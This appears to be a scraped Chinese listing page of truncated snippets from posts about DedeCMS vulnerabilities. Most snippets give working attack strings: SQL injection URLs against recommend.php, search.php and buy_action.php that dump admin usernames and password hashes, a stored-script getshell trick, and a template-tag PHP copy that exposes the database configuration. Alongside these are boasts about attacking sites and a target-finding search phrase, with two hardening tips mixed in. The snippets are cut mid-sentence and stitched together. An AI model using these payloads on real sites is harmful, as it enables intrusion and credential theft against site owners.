DedeCMS 20140201 之前的5.7通杀
无需注册会员账号: Exp:plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=' or mid=@`'` /*!50000union*//*!50000select*/1,2,3,(select CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin` limit+0,1),5,6,...
无需注册会员账号: Exp:plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=' or mid=@`'` /*!50000union*//*!50000select*/1,2,3,(select CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin` limit+0,1),5,6,...
哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。 既然已经发出来了,我就把我自己搞的exp发下吧。。唉。 我一般是这样测试的: 提交 http://webshell.cc/plus/search.php?keyword=as&typeArr[ uNion ]=a ...
data目录是系统缓存和配置文件的目录,一般都有可以读写的权限,只要是能够写入的目录都可能存在安全隐患,很多站长甚至给予这个目录可执行的权限,更是非常危险,所以我们建议将这个data目录搬移出Web可访问目录之外。本篇将介绍如何将data目录搬移出Web访问目录。 1.将data目录转移到非Web目录 我们这里举例“D:\dedecms\v57”为我们系统的根目录,我们需要将目录下的data文件夹...
DEDECMS由于编辑器过滤不严,将导致恶意脚本运行。可getshell取得权限。为什么说它是0Day呢?能getshell的都算0Day(鸡肋发挥起来也能变凤凰) 目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。下面说说利用方法。条件有2个: 开启注册 开启投稿 注册会员-发表文章投稿,内容如下填写: <style>@im\port'\http://webshe...
DEDECMS 这名词细想起来,我还是有一份特殊的感情的,当初做网站的时候,最早用的动易CMS2006,后来转PHP后,一直用的DEDECMS,只是现今不在用了而已,可以说,它造就了很多中小站长,是中小站长的福音。 下面就DEDECMS的安全设置,简单记录下。 1、尽量使用纯PHP的主机空间,如果非要使用WINDOWS,最好关闭非所有PHP支持; 2、更改默认的 www.webshell.c...
# Dede Cms All Versions Sql Vulnerability Exploit # </ No Priv8 , Everything is Public > # Date: 30/12/2011 - 13:00 # Author: [ CWH ] | Finded By : Nafsh # We Are : Mr.M4st3r , Nafsh , Skote_Vah...
只测试了DEDECMS V5.7系统,之前的版本估计也一样。 在官方地址进行的简单测试,应该算是一个小BUG,利用这个可以无限的刷某篇文章的顶/踩 数值。 详细说明:虽然前端页面做了 游客 只能提交一次的限制,但是直接以URL访问则没有限制,只要按着F5不放,一会就能上百上千。。。。 而且dede的官方也木有做这方面的限制。。。你懂的 漏洞证明:http://www.dedecms.com/plu...
By:zafe 遇到可写不可执行的,可执行不可写的站的也许用的上 {dede:php}copy('../data/common.inc.php','../data/cache/test.txt');{/dede:php} 然后去xxx.com/data/cache/test.txt看数据库信息,如果是root那就happy吧 如果是普通用户,首先看下有哪些数据库: //自行把{dede:php}{...
搜索关键词:powered by dedecms 首先注册个用户,注册地址: /member/index_do.php?fmdo=user&dopost=regnew 爆管理帐号: /member/buy_action.php?product=member&pid=1%20and%201=11%20union%20select%201,2,userid,4,5%20from%20%...
好吧之前就把google发在了90sec 跟t00ls了!不过过了一会黑阔们就去扫描我shell地址了! 额滴神啊,速度太快了!!没办法马上赶写了一个批量修改文件名称的把shell全部移动了地方修改了文件名! 最后再把漏洞文件给那个啥了!不过一看黑阔们又挖出shell地址出来了!! 好吧不跟你们耗了。想想还是把代码发出来吧!! 这个是百度批量的。自己保存为xx.php <?php print...